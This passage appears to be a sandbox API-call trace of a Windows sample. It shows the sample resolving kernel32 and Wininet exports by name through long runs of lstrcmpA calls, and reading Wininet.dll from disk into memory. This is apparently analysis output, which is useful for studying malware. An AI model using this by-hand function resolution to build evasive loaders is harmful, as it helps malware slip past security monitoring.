returned 1 [0097.966] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0097.966] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0097.966] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0097.966] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0097.966] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0097.967] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0097.967] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.968] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0097.968] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0097.968] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0097.969] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0097.969] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0097.969] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0097.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0097.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0097.971] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0097.971] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0097.972] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0097.972] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0097.972] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0097.972] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0097.972] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0097.972] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0097.973] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.973] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0097.974] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0097.975] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0099.748] GetProcessHeap () returned 0x4f0000 [0099.748] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c5c0 | out: hHeap=0x4f0000) returned 1 [0099.751] GetProcessHeap () returned 0x4f0000 [0099.751] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x5090b0 [0099.752] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0099.765] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0099.765] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0099.766] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0099.766] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0099.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0099.766] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0099.766] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0099.766] GetProcessHeap () returned 0x4f0000 [0099.766] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x286600) returned 0x40b4040 [0099.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0099.978] ReadFile (in: hFile=0x140, lpBuffer=0x40b4040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b4040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0100.362] CloseHandle (hObject=0x140) returned 1 [0100.362] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0100.362] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0100.362] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0100.362] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0100.362] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0100.362] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0100.362] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0100.362] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0100.362] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.362] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0100.363] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0100.363] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0100.363] lstrcmpA (lpString1="AppCacheDuplicateHandle", 